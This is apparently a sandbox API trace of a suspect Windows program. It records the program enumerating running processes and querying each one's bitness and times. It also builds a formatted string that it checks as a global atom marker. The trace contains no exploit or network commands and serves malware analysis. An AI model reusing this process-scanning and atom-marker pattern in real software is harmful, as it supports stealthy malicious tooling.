	[0074.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.548] CloseHandle (hObject=0x224) returned 1
	[0074.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.548] CloseHandle (hObject=0x224) returned 1
	[0074.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.549] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.549] CloseHandle (hObject=0x224) returned 1
	[0074.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.549] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.549] CloseHandle (hObject=0x224) returned 1
	[0074.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb08, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.549] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.549] CloseHandle (hObject=0x224) returned 1
	[0074.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.549] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.549] CloseHandle (hObject=0x224) returned 1
	[0074.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.550] CloseHandle (hObject=0x224) returned 1
	[0074.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.550] CloseHandle (hObject=0x224) returned 1
	[0074.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.550] CloseHandle (hObject=0x224) returned 1
	[0074.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.550] CloseHandle (hObject=0x224) returned 1
	[0074.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.550] CloseHandle (hObject=0x224) returned 1
	[0074.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.551] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.551] CloseHandle (hObject=0x224) returned 1
	[0074.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.551] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.552] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.552] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.552] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.553] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetLastError () returned 0x5
	[0074.554] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.555] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.555] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.555] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.555] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.555] CloseHandle (hObject=0x224) returned 1
	[0074.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.555] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.555] CloseHandle (hObject=0x224) returned 1
	[0074.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e8d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.555] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.556] CloseHandle (hObject=0x224) returned 1
	[0074.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d18) returned 0xc0000004
	[0074.586] VirtualAlloc (lpAddress=0x0, dwSize=0x16e18, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e18, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbc0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.590] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.590] CloseHandle (hObject=0x224) returned 1
	[0074.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.591] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.592] CloseHandle (hObject=0x224) returned 1
	[0074.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728978, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.592] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.592] CloseHandle (hObject=0x224) returned 1
	[0074.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.592] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.592] CloseHandle (hObject=0x224) returned 1
	[0074.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.592] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.592] CloseHandle (hObject=0x224) returned 1
